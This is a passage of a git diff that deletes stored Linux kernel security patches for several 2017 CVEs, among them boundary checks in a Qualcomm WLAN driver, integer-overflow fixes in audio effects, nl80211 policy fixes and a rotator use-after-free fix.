-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -908,6 +908,9 @@ wlan_hdd_pno_config_policy[QCA_WLAN_VENDOR_ATTR_PNO_MAX + 1] = {
- [QCA_WLAN_VENDOR_ATTR_EPNO_BAND5GHZ_BONUS] = {
- .type = NLA_U32
- },
-+ [QCA_WLAN_VENDOR_ATTR_PNO_CONFIG_REQUEST_ID] = {
-+ .type = NLA_U32
-+ },
- };
-
- static const struct nla_policy
-@@ -4772,12 +4775,12 @@ static int __wlan_hdd_cfg80211_set_epno_list(struct wiphy *wiphy,
- req_msg->num_networks = num_networks;
-
- /* Parse and fetch request Id */
-- if (!tb[QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_REQUEST_ID]) {
-+ if (!tb[QCA_WLAN_VENDOR_ATTR_PNO_CONFIG_REQUEST_ID]) {
- hddLog(LOGE, FL("attr request id failed"));
- goto fail;
- }
- req_msg->request_id = nla_get_u32(
-- tb[QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_REQUEST_ID]);
-+ tb[QCA_WLAN_VENDOR_ATTR_PNO_CONFIG_REQUEST_ID]);
-
- req_msg->session_id = adapter->sessionId;
- hddLog(LOG1, FL("Req Id %u Session Id %d"),
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11067/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-11067/ANY/0001.patch
deleted file mode 100644
index c5527abc..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11067/ANY/0001.patch
+++ /dev/null
@@ -1,139 +0,0 @@
-From 3fabdcba3a09ce8f3cc757bf6240e53421a1e363 Mon Sep 17 00:00:00 2001
-From: Srinivas Girigowda
-Date: Fri, 4 Aug 2017 15:51:34 -0700
-Subject: [PATCH] qcacld-2.0: Check target address boundary before access
-
-Athdiag procfs entry does not have address sanity check, this is
-resulting in invalid ioread32/iowrite32 if out of PCIE BAR address
-is used.
-
-Fix this by allowing address with in PCIE BAR range.
-
-Change-Id: I8365eacca7ccc4f489b7d0bda6c998384d0fec7b
-CRs-Fixed: 2062012
-Bug: 62058746
-Signed-off-by: Srinivas Girigowda
----
- .../staging/qcacld-2.0/CORE/SERVICES/COMMON/hif.h | 8 +++++++
- .../qcacld-2.0/CORE/SERVICES/HIF/PCIe/hif_pci.c | 26 ++++++++++++++++++++++
- .../qcacld-2.0/CORE/SERVICES/HIF/PCIe/if_pci.c | 1 +
- .../qcacld-2.0/CORE/SERVICES/HIF/PCIe/if_pci.h | 2 +-
- .../qcacld-2.0/CORE/SERVICES/HIF/ath_procfs.c | 9 ++++++--
- 5 files changed, 43 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/SERVICES/COMMON/hif.h b/drivers/staging/qcacld-2.0/CORE/SERVICES/COMMON/hif.h
-index a3c31afe3bd67..06a02eebc1be5 100644
---- a/drivers/staging/qcacld-2.0/CORE/SERVICES/COMMON/hif.h
-+++ b/drivers/staging/qcacld-2.0/CORE/SERVICES/COMMON/hif.h
-@@ -880,4 +880,12 @@ static inline void hif_request_runtime_pm_resume(void *ol_sc)
-
- A_BOOL HIFIsMailBoxSwapped(HIF_DEVICE *hd);
-
-+#ifdef HIF_PCI
-+int hif_addr_in_boundary(HIF_DEVICE *hif_device, A_UINT32 offset);
-+#else
-+static inline int hif_addr_in_boundary(HIF_DEVICE *hif_device, A_UINT32 offset)
-+{
-+ return 0;
-+}
-+#endif
- #endif /* _HIF_H_ */
-diff --git a/drivers/staging/qcacld-2.0/CORE/SERVICES/HIF/PCIe/hif_pci.c b/drivers/staging/qcacld-2.0/CORE/SERVICES/HIF/PCIe/hif_pci.c
-index 3a1de9d23d07a..ba33ac976305a 100644
---- a/drivers/staging/qcacld-2.0/CORE/SERVICES/HIF/PCIe/hif_pci.c
-+++ b/drivers/staging/qcacld-2.0/CORE/SERVICES/HIF/PCIe/hif_pci.c
-@@ -3628,3 +3628,29 @@ bool hif_is_80211_fw_wow_required(void)
- {
- return false;
- }
-+
-+/* hif_addr_in_boundary() - API to check if addr is with in PCIE BAR range
-+ * @hif_device: context of cd
-+ * @offset: offset from PCI BAR mapped base address.
-+ *
-+ * API determines if address to be accessed is with in range or out
-+ * of bound.
-+ *
-+ * Return: success if address is with in PCI BAR range.
-+ */
-+int hif_addr_in_boundary(HIF_DEVICE *hif_device, A_UINT32 offset)
-+{
-+ struct HIF_CE_state *hif_state;
-+ struct hif_pci_softc *sc;
-+
-+ hif_state = (struct HIF_CE_state *)hif_device;
-+ sc = hif_state->sc;
-+ if (unlikely(offset + sizeof(unsigned int) > sc->mem_len)) {
-+ VOS_TRACE(VOS_MODULE_ID_HIF, VOS_TRACE_LEVEL_ERROR,
-+ "refusing to read mmio out of bounds at 0x%08x - 0x%08zx (max 0x%08zx)\n",
-+ offset, offset + sizeof(unsigned int), sc->mem_len);
-+ return -EINVAL;
-+ }
-+
-+ return 0;
-+}
-diff --git a/drivers/staging/qcacld-2.0/CORE/SERVICES/HIF/PCIe/if_pci.c b/drivers/staging/qcacld-2.0/CORE/SERVICES/HIF/PCIe/if_pci.c
-index 17792cd6460e4..0d5fd226f5275 100644
---- a/drivers/staging/qcacld-2.0/CORE/SERVICES/HIF/PCIe/if_pci.c
-+++ b/drivers/staging/qcacld-2.0/CORE/SERVICES/HIF/PCIe/if_pci.c
-@@ -1589,6 +1589,7 @@ hif_pci_probe(struct pci_dev *pdev, const struct pci_device_id *id)
-
- OS_MEMZERO(sc, sizeof(*sc));
- sc->mem = mem;
-+ sc->mem_len = pci_resource_len(pdev, BAR_NUM);
- sc->pdev = pdev;
- sc->dev = &pdev->dev;
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/SERVICES/HIF/PCIe/if_pci.h b/drivers/staging/qcacld-2.0/CORE/SERVICES/HIF/PCIe/if_pci.h
-index 3204f6101eb9d..ea0e22d3d1a80 100644
---- a/drivers/staging/qcacld-2.0/CORE/SERVICES/HIF/PCIe/if_pci.h
-+++ b/drivers/staging/qcacld-2.0/CORE/SERVICES/HIF/PCIe/if_pci.h
-@@ -82,7 +82,7 @@ struct hif_pci_pm_stats {
- struct hif_pci_softc {
- void __iomem *mem; /* PCI address. */
- /* For efficiency, should be first in struct */
--
-+ size_t mem_len;
- struct device *dev;
- struct pci_dev *pdev;
- struct _NIC_DEV aps_osdev;
-diff --git a/drivers/staging/qcacld-2.0/CORE/SERVICES/HIF/ath_procfs.c b/drivers/staging/qcacld-2.0/CORE/SERVICES/HIF/ath_procfs.c
-index ed0cfd69d7228..d1a34dd6c3966 100644
---- a/drivers/staging/qcacld-2.0/CORE/SERVICES/HIF/ath_procfs.c
-+++ b/drivers/staging/qcacld-2.0/CORE/SERVICES/HIF/ath_procfs.c
-@@ -90,13 +90,16 @@ static ssize_t ath_procfs_diag_read(struct file *file, char __user *buf,
- int rv;
- A_UINT8 *read_buffer = NULL;
-
-+ hif_hdl = get_hif_hdl_from_file(file);
-+ if (hif_addr_in_boundary(hif_hdl, (A_UINT32)(*pos)))
-+ return -EINVAL;
-+
- read_buffer = (A_UINT8 *)vos_mem_malloc(count);
- if (NULL == read_buffer) {
- pr_debug("%s: vos_mem_alloc failed\n", __func__);
- return -EINVAL;
- }
-
-- hif_hdl = get_hif_hdl_from_file(file);
- pr_debug("rd buff 0x%p cnt %zu offset 0x%x buf 0x%p\n",
- read_buffer,count,
- (int)*pos, buf);
-@@ -129,6 +132,9 @@ static ssize_t ath_procfs_diag_write(struct file *file, const char __user *buf,
- int rv;
- A_UINT8 *write_buffer = NULL;
-
-+ hif_hdl = get_hif_hdl_from_file(file);
-+ if (hif_addr_in_boundary(hif_hdl, (A_UINT32)(*pos)))
-+ return -EINVAL;
- write_buffer = (A_UINT8 *)vos_mem_malloc(count);
- if (NULL == write_buffer) {
- pr_debug("%s: vos_mem_alloc failed\n", __func__);
-@@ -139,7 +145,6 @@ static ssize_t ath_procfs_diag_write(struct file *file, const char __user *buf,
- return -EFAULT;
- }
-
-- hif_hdl = get_hif_hdl_from_file(file);
- pr_debug("wr buff 0x%p buf 0x%p cnt %zu offset 0x%x value 0x%x\n",
- write_buffer, buf, count,
- (int)*pos, *((A_UINT32 *)write_buffer));
diff --git a/Patches/Linux_CVEs/CVE-2017-11073/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-11073/3.10/0001.patch
deleted file mode 100644
index 685a041e..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11073/3.10/0001.patch
+++ /dev/null
@@ -1,143 +0,0 @@
-From 120d28bad9890eca3a6451a83a7c71cb650dfef7 Mon Sep 17 00:00:00 2001
-From: "Poddar, Siddarth"
-Date: Wed, 5 Jul 2017 12:31:03 +0530
-Subject: [PATCH] qcacld-2.0: Remove code related to mmap functionality for
- pktlog
-
-Remove the code related to mmap functionality for pktlog
-as it is no longer used/required.
-
-Bug: 62084791
-Change-Id: I06767f108c0ff6462a9e20e7b50d08bf4ac9555f
-CRs-Fixed: 2064767
-Signed-off-by: Ahmed ElArabawy
----
- .../qcacld-2.0/CORE/UTILS/PKTLOG/linux_ac.c | 102 ---------------------
- 1 file changed, 102 deletions(-)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/UTILS/PKTLOG/linux_ac.c b/drivers/staging/qcacld-2.0/CORE/UTILS/PKTLOG/linux_ac.c
-index 173ed4e8eec1a..ec61b77e827cf 100644
---- a/drivers/staging/qcacld-2.0/CORE/UTILS/PKTLOG/linux_ac.c
-+++ b/drivers/staging/qcacld-2.0/CORE/UTILS/PKTLOG/linux_ac.c
-@@ -82,14 +82,12 @@ static int pktlog_attach(struct ol_softc *sc);
- static void pktlog_detach(struct ol_softc *sc);
- static int pktlog_open(struct inode *i, struct file *f);
- static int pktlog_release(struct inode *i, struct file *f);
--static int pktlog_mmap(struct file *f, struct vm_area_struct *vma);
- static ssize_t pktlog_read(struct file *file, char *buf, size_t nbytes,
- loff_t * ppos);
-
- static struct file_operations pktlog_fops = {
- open:pktlog_open,
- release:pktlog_release,
-- mmap:pktlog_mmap,
- read:pktlog_read,
- };
-
-@@ -921,106 +919,6 @@ static volatile void *pktlog_virt_to_logical(volatile void *addr)
- }
- #endif
-
--/* vma operations for mapping vmalloced area to user space */
--static void pktlog_vopen(struct vm_area_struct *vma)
--{
-- PKTLOG_MOD_INC_USE_COUNT;
--}
--
--static void pktlog_vclose(struct vm_area_struct *vma)
--{
-- PKTLOG_MOD_DEC_USE_COUNT;
--}
--
--#if LINUX_VERSION_CODE > KERNEL_VERSION(2,6,25)
--int pktlog_fault(struct vm_area_struct *vma, struct vm_fault *vmf)
--{
-- unsigned long address = (unsigned long)vmf->virtual_address;
--
-- if (address == 0UL)
-- return VM_FAULT_NOPAGE;
--
-- if (vmf->pgoff > vma->vm_end)
-- return VM_FAULT_SIGBUS;
--
-- get_page(virt_to_page((void *)address));
-- vmf->page = virt_to_page((void *)address);
-- return VM_FAULT_MINOR;
--}
--#else
--#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,0)
--struct page *pktlog_vmmap(struct vm_area_struct *vma, unsigned long addr,
-- int *type)
--#else
--struct page *pktlog_vmmap(struct vm_area_struct *vma, unsigned long addr,
-- int write_access)
--#endif
--{
-- unsigned long offset, vaddr;
-- struct proc_dir_entry *proc_entry;
-- struct ath_pktlog_info *pl_info =
--
-- proc_entry = PDE(vma->vm_file->f_dentry->d_inode);
-- pl_info = (struct ath_pktlog_info *)proc_entry->data;
--
-- offset = addr - vma->vm_start + (vma->vm_pgoff << PAGE_SHIFT);
-- vaddr = (unsigned long) pktlog_virt_to_logical(
-- (void *)(pl_info->buf) + offset);
--
-- if (vaddr == 0UL) {
-- printk(PKTLOG_TAG "%s: page fault out of range\n", __func__);
-- return ((struct page *) 0UL);
-- }
--
-- /* increment the usage count of the page */
-- get_page(virt_to_page((void*)vaddr));
--
--#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,0)
-- if (type)
-- *type = VM_FAULT_MINOR;
--#endif
--
-- return virt_to_page((void *)vaddr);
--}
--#endif /* LINUX_VERSION_CODE > KERNEL_VERSION(2,6,25) */
--
--static struct vm_operations_struct pktlog_vmops = {
-- open:pktlog_vopen,
-- close:pktlog_vclose,
--#if LINUX_VERSION_CODE > KERNEL_VERSION(2,6,25)
-- fault:pktlog_fault,
--#else
-- nopage:pktlog_vmmap,
--#endif
--};
--
--static int pktlog_mmap(struct file *file, struct vm_area_struct *vma)
--{
--#if LINUX_VERSION_CODE >= KERNEL_VERSION(3,10,0)
-- struct ath_pktlog_info *pl_info = (struct ath_pktlog_info *)
-- PDE_DATA(file->f_path.dentry->d_inode);
--#else
-- struct proc_dir_entry *proc_entry = PDE(file->f_dentry->d_inode);
-- struct ath_pktlog_info *pl_info = (struct ath_pktlog_info *)
-- proc_entry->data;
--#endif
--
-- if (vma->vm_pgoff != 0) {
-- /* Entire buffer should be mapped */
-- return -EINVAL;
-- }
--
-- if (!pl_info->buf) {
-- printk(PKTLOG_TAG "%s: Log buffer unavailable\n", __func__);
-- return -ENOMEM;
-- }
--
-- vma->vm_flags |= VM_LOCKED;
-- vma->vm_ops = &pktlog_vmops;
-- pktlog_vopen(vma);
-- return 0;
--}
--
- int pktlogmod_init(void *context)
- {
- int ret;
diff --git a/Patches/Linux_CVEs/CVE-2017-11085/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-11085/3.10/0001.patch
deleted file mode 100644
index a55a439d..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11085/3.10/0001.patch
+++ /dev/null
@@ -1,274 +0,0 @@
-From dc8f7a19762df2c84678482b60f6b807b919eb44 Mon Sep 17 00:00:00 2001
-From: Weiyin Jiang
-Date: Fri, 28 Jul 2017 11:01:40 +0800
-Subject: [PATCH] SoC: msm: audio-effects: return directly to avoid integer
- overflow
-
-Return error code directly to avoid further integer overflow leading
-to buffer overflow.
-
-Bug: 62952032
-Change-Id: I8b74efda227726494724f4387c45b5b6fa04637b
-CRs-Fixed: 2077909
-Signed-off-by: Weiyin Jiang
-Signed-off-by: Paresh Purabhiya
----
- sound/soc/msm/qdsp6v2/msm-audio-effects-q6-v2.c | 56 ++++++++++++-------------
- 1 file changed, 28 insertions(+), 28 deletions(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-audio-effects-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-audio-effects-q6-v2.c
-index 2bcd339f1ff59..95c382ddb77b9 100644
---- a/sound/soc/msm/qdsp6v2/msm-audio-effects-q6-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-audio-effects-q6-v2.c
-@@ -175,7 +175,7 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- MAX_INBAND_PARAM_SZ,
- "VIRT ENABLE", rc);
- if (rc != 0)
-- break;
-+ goto invalid_config;
- *updt_params++ =
- AUDPROC_MODULE_ID_VIRTUALIZER;
- *updt_params++ =
-@@ -203,7 +203,7 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- MAX_INBAND_PARAM_SZ,
- "VIRT STRENGTH", rc);
- if (rc != 0)
-- break;
-+ goto invalid_config;
- *updt_params++ =
- AUDPROC_MODULE_ID_VIRTUALIZER;
- *updt_params++ =
-@@ -231,7 +231,7 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- MAX_INBAND_PARAM_SZ,
- "VIRT OUT_TYPE", rc);
- if (rc != 0)
-- break;
-+ goto invalid_config;
- *updt_params++ =
- AUDPROC_MODULE_ID_VIRTUALIZER;
- *updt_params++ =
-@@ -259,7 +259,7 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- MAX_INBAND_PARAM_SZ,
- "VIRT GAIN_ADJUST", rc);
- if (rc != 0)
-- break;
-+ goto invalid_config;
- *updt_params++ =
- AUDPROC_MODULE_ID_VIRTUALIZER;
- *updt_params++ =
-@@ -338,7 +338,7 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 
MAX_INBAND_PARAM_SZ,
- "REVERB_ENABLE", rc);
- if (rc != 0)
-- break;
-+ goto invalid_config;
- *updt_params++ =
- AUDPROC_MODULE_ID_REVERB;
- *updt_params++ =
-@@ -366,7 +366,7 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- MAX_INBAND_PARAM_SZ,
- "REVERB_MODE", rc);
- if (rc != 0)
-- break;
-+ goto invalid_config;
- *updt_params++ =
- AUDPROC_MODULE_ID_REVERB;
- *updt_params++ =
-@@ -394,7 +394,7 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- MAX_INBAND_PARAM_SZ,
- "REVERB_PRESET", rc);
- if (rc != 0)
-- break;
-+ goto invalid_config;
- *updt_params++ =
- AUDPROC_MODULE_ID_REVERB;
- *updt_params++ =
-@@ -422,7 +422,7 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- MAX_INBAND_PARAM_SZ,
- "REVERB_WET_MIX", rc);
- if (rc != 0)
-- break;
-+ goto invalid_config;
- *updt_params++ =
- AUDPROC_MODULE_ID_REVERB;
- *updt_params++ =
-@@ -450,7 +450,7 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- MAX_INBAND_PARAM_SZ,
- "REVERB_GAIN_ADJUST", rc);
- if (rc != 0)
-- break;
-+ goto invalid_config;
- *updt_params++ =
- AUDPROC_MODULE_ID_REVERB;
- *updt_params++ =
-@@ -478,7 +478,7 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- MAX_INBAND_PARAM_SZ,
- "REVERB_ROOM_LEVEL", rc);
- if (rc != 0)
-- break;
-+ goto invalid_config;
- *updt_params++ =
- AUDPROC_MODULE_ID_REVERB;
- *updt_params++ =
-@@ -506,7 +506,7 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- MAX_INBAND_PARAM_SZ,
- "REVERB_ROOM_HF_LEVEL", rc);
- if (rc != 0)
-- break;
-+ goto invalid_config;
- *updt_params++ =
- AUDPROC_MODULE_ID_REVERB;
- *updt_params++ =
-@@ -534,7 +534,7 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- MAX_INBAND_PARAM_SZ,
- "REVERB_DECAY_TIME", rc);
- if (rc != 0)
-- break;
-+ goto invalid_config;
- *updt_params++ =
- AUDPROC_MODULE_ID_REVERB;
- *updt_params++ =
-@@ -562,7 +562,7 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- MAX_INBAND_PARAM_SZ,
- "REVERB_DECAY_HF_RATIO", rc);
- if (rc != 0)
-- break;
-+ goto invalid_config;
- *updt_params++ =
- AUDPROC_MODULE_ID_REVERB;
- *updt_params++ =
-@@ -590,7 +590,7 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- MAX_INBAND_PARAM_SZ,
- "REVERB_REFLECTIONS_LEVEL", rc);
- if (rc != 0)
-- break;
-+ goto invalid_config;
- *updt_params++ =
- AUDPROC_MODULE_ID_REVERB;
- *updt_params++ =
-@@ -618,7 +618,7 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- MAX_INBAND_PARAM_SZ,
- "REVERB_REFLECTIONS_DELAY", rc);
- if (rc != 0)
-- break;
-+ goto invalid_config;
- *updt_params++ =
- AUDPROC_MODULE_ID_REVERB;
- *updt_params++ =
-@@ -646,7 +646,7 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- MAX_INBAND_PARAM_SZ,
- "REVERB_LEVEL", rc);
- if (rc != 0)
-- break;
-+ goto invalid_config;
- *updt_params++ =
- AUDPROC_MODULE_ID_REVERB;
- *updt_params++ =
-@@ -674,7 +674,7 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- MAX_INBAND_PARAM_SZ,
- "REVERB_DELAY", rc);
- if (rc != 0)
-- break;
-+ goto invalid_config;
- *updt_params++ =
- AUDPROC_MODULE_ID_REVERB;
- *updt_params++ =
-@@ -702,7 +702,7 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- MAX_INBAND_PARAM_SZ,
- "REVERB_DIFFUSION", rc);
- if (rc != 0)
-- break;
-+ goto invalid_config;
- *updt_params++ =
- AUDPROC_MODULE_ID_REVERB;
- *updt_params++ =
-@@ -730,7 +730,7 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- MAX_INBAND_PARAM_SZ,
- "REVERB_DENSITY", rc);
- if (rc != 0)
-- break;
-+ goto invalid_config;
- *updt_params++ =
- AUDPROC_MODULE_ID_REVERB;
- *updt_params++ =
-@@ -810,7 +810,7 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac,
- MAX_INBAND_PARAM_SZ,
- "BASS_BOOST_ENABLE", rc);
- if (rc != 0)
-- break;
-+ goto invalid_config;
- *updt_params++ =
- AUDPROC_MODULE_ID_BASS_BOOST;
- *updt_params++ =
-@@ -838,7 +838,7 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac,
- 
MAX_INBAND_PARAM_SZ,
- "BASS_BOOST_MODE", rc);
- if (rc != 0)
-- break;
-+ goto invalid_config;
- *updt_params++ =
- AUDPROC_MODULE_ID_BASS_BOOST;
- *updt_params++ =
-@@ -866,7 +866,7 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac,
- MAX_INBAND_PARAM_SZ,
- "BASS_BOOST_STRENGTH", rc);
- if (rc != 0)
-- break;
-+ goto invalid_config;
- *updt_params++ =
- AUDPROC_MODULE_ID_BASS_BOOST;
- *updt_params++ =
-@@ -947,7 +947,7 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac,
- MAX_INBAND_PARAM_SZ,
- "EQ_ENABLE", rc);
- if (rc != 0)
-- break;
-+ goto invalid_config;
- *updt_params++ =
- AUDPROC_MODULE_ID_POPLESS_EQUALIZER;
- *updt_params++ =
-@@ -1015,7 +1015,7 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac,
- MAX_INBAND_PARAM_SZ,
- "EQ_CONFIG", rc);
- if (rc != 0)
-- break;
-+ goto invalid_config;
- *updt_params++ =
- AUDPROC_MODULE_ID_POPLESS_EQUALIZER;
- *updt_params++ =
-@@ -1066,7 +1066,7 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac,
- MAX_INBAND_PARAM_SZ,
- "EQ_BAND_INDEX", rc);
- if (rc != 0)
-- break;
-+ goto invalid_config;
- *updt_params++ =
- AUDPROC_MODULE_ID_POPLESS_EQUALIZER;
- *updt_params++ =
-@@ -1098,7 +1098,7 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac,
- MAX_INBAND_PARAM_SZ,
- "EQ_SINGLE_BAND_FREQ", rc);
- if (rc != 0)
-- break;
-+ goto invalid_config;
- *updt_params++ =
- AUDPROC_MODULE_ID_POPLESS_EQUALIZER;
- *updt_params++ =
-@@ -1188,7 +1188,7 @@ static int __msm_audio_effects_volume_handler(struct audio_client *ac,
- "VOLUME/VOLUME2_GAIN_2CH",
- rc);
- if (rc != 0)
-- break;
-+ goto invalid_config;
- if (instance == SOFT_VOLUME_INSTANCE_2)
- *updt_params++ =
- ASM_MODULE_ID_VOL_CTRL2;
-@@ -1237,7 +1237,7 @@ static int __msm_audio_effects_volume_handler(struct audio_client *ac,
- "VOLUME/VOLUME2_GAIN_MASTER",
- rc);
- if (rc != 0)
-- break;
-+ goto invalid_config;
- if (instance == SOFT_VOLUME_INSTANCE_2)
- *updt_params++ =
- 
ASM_MODULE_ID_VOL_CTRL2; diff --git a/Patches/Linux_CVEs/CVE-2017-11089/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-11089/ANY/0001.patch deleted file mode 100644 index 7dca8216..00000000 --- a/Patches/Linux_CVEs/CVE-2017-11089/ANY/0001.patch +++ /dev/null @@ -1,12 +0,0 @@ -diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c -index 78b6f74..f927434 100644 ---- a/net/wireless/nl80211.c -+++ b/net/wireless/nl80211.c -@@ -365,6 +365,7 @@ - [NL80211_ATTR_SCAN_FLAGS] = { .type = NLA_U32 }, - [NL80211_ATTR_P2P_CTWINDOW] = { .type = NLA_U8 }, - [NL80211_ATTR_P2P_OPPPS] = { .type = NLA_U8 }, -+ [NL80211_ATTR_LOCAL_MESH_POWER_MODE] = {. type = NLA_U32 }, - [NL80211_ATTR_ACL_POLICY] = {. type = NLA_U32 }, - [NL80211_ATTR_MAC_ADDRS] = { .type = NLA_NESTED }, - [NL80211_ATTR_STA_CAPABILITY] = { .type = NLA_U16 }, diff --git a/Patches/Linux_CVEs/CVE-2017-11089/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-11089/ANY/0001.patch.base64 deleted file mode 100644 index f8a6d711..00000000 --- a/Patches/Linux_CVEs/CVE-2017-11089/ANY/0001.patch.base64 +++ /dev/null @@ -1 +0,0 @@ -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 \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2017-11090/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-11090/ANY/0001.patch deleted file mode 100644 index e3116765..00000000 --- a/Patches/Linux_CVEs/CVE-2017-11090/ANY/0001.patch +++ /dev/null 
@@ -1,14 +0,0 @@ -diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c -index 5112673..78b6f74 100644 ---- a/net/wireless/nl80211.c -+++ b/net/wireless/nl80211.c -@@ -310,8 +310,7 @@ - [NL80211_ATTR_WPA_VERSIONS] = { .type = NLA_U32 }, - [NL80211_ATTR_PID] = { .type = NLA_U32 }, - [NL80211_ATTR_4ADDR] = { .type = NLA_U8 }, -- [NL80211_ATTR_PMKID] = { .type = NLA_BINARY, -- .len = WLAN_PMKID_LEN }, -+ [NL80211_ATTR_PMKID] = { .len = WLAN_PMKID_LEN }, - [NL80211_ATTR_DURATION] = { .type = NLA_U32 }, - [NL80211_ATTR_COOKIE] = { .type = NLA_U64 }, - [NL80211_ATTR_TX_RATES] = { .type = NLA_NESTED }, diff --git a/Patches/Linux_CVEs/CVE-2017-11090/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-11090/ANY/0001.patch.base64 deleted file mode 100644 index b1a4f493..00000000 --- a/Patches/Linux_CVEs/CVE-2017-11090/ANY/0001.patch.base64 +++ /dev/null @@ -1 +0,0 @@ -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 \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2017-11091/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-11091/3.18/0001.patch deleted file mode 100644 index cdd5771c..00000000 --- a/Patches/Linux_CVEs/CVE-2017-11091/3.18/0001.patch +++ /dev/null 
@@ -1,61 +0,0 @@
-From 10b0cb47e92abe52c5372ded0fe80a5a5f18586f Mon Sep 17 00:00:00 2001
-From: Harsh Sahu
-Date: Thu, 29 Jun 2017 18:50:20 -0700
-Subject: [PATCH] msm: mdss: fix the use after free problem in rotator ioctl
-
-Currently the fence fd is installed too early. This can cause a
-use after free problem if the fence fd is closed in some other thread.
-This change will install the fence fd where it is required and
-eliminates the problem.
-
-Bug: 37478866
-Change-Id: I5cf585ea87ef75fccae06da6cb5a6c16fc74eff3
-Signed-off-by: Harsh Sahu
----
- drivers/video/msm/mdss/mdss_rotator.c | 12 +++++++++++-
- 1 file changed, 11 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/video/msm/mdss/mdss_rotator.c b/drivers/video/msm/mdss/mdss_rotator.c
-index 95ca5b74e2369..5910a69bc844b 100644
---- a/drivers/video/msm/mdss/mdss_rotator.c
-+++ b/drivers/video/msm/mdss/mdss_rotator.c
-@@ -375,6 +375,15 @@ static bool mdss_rotator_is_work_pending(struct mdss_rot_mgr *mgr,
- return false;
- }
-
-+static void mdss_rotator_install_fence_fd(struct mdss_rot_entry_container *req)
-+{
-+ int i = 0;
-+
-+ for (i = 0; i < req->count; i++)
-+ sync_fence_install(req->entries[i].output_fence,
-+ req->entries[i].output_fence_fd);
-+}
-+
- static int mdss_rotator_create_fence(struct mdss_rot_entry *entry)
- {
- int ret = 0, fd;
-@@ -413,7 +422,6 @@ static int mdss_rotator_create_fence(struct mdss_rot_entry *entry)
- goto get_fd_err;
- }
-
-- sync_fence_install(fence, fd);
- rot_timeline->next_value++;
- mutex_unlock(&rot_timeline->lock);
-
-@@ -2248,6 +2256,7 @@ static int mdss_rotator_handle_request(struct mdss_rot_mgr *mgr,
- goto handle_request_err1;
- }
-
-+ mdss_rotator_install_fence_fd(req);
- mdss_rotator_queue_request(mgr, private, req);
-
- mutex_unlock(&mgr->lock);
-@@ -2408,6 +2417,7 @@ static int mdss_rotator_handle_request32(struct mdss_rot_mgr *mgr,
- goto handle_request32_err1;
- }
-
-+ mdss_rotator_install_fence_fd(req);
- mdss_rotator_queue_request(mgr, private, req);
-
- mutex_unlock(&mgr->lock);
diff --git a/Patches/Linux_CVEs/CVE-2017-11092/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-11092/ANY/0001.patch
deleted file mode 100644
index 14ae6c00..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11092/ANY/0001.patch
+++ /dev/null
@@ -1,164 +0,0 @@
-diff --git a/drivers/gpu/msm/kgsl.c b/drivers/gpu/msm/kgsl.c
-index 350ad08..44f981c 100644
---- a/drivers/gpu/msm/kgsl.c
-+++ b/drivers/gpu/msm/kgsl.c
-@@ -1609,6 +1609,7 @@
- struct kgsl_device *device;
- struct kgsl_cmdbatch *cmdbatch = (struct kgsl_cmdbatch *) data;
- struct kgsl_cmdbatch_sync_event *event;
-+ unsigned long flags;
-
- if (cmdbatch == NULL || cmdbatch->context == NULL)
- return;
-@@ -1623,14 +1624,14 @@
- kgsl_context_dump(cmdbatch->context);
- clear_bit(CMDBATCH_FLAG_FENCE_LOG, &cmdbatch->priv);
-
-- spin_lock(&cmdbatch->lock);
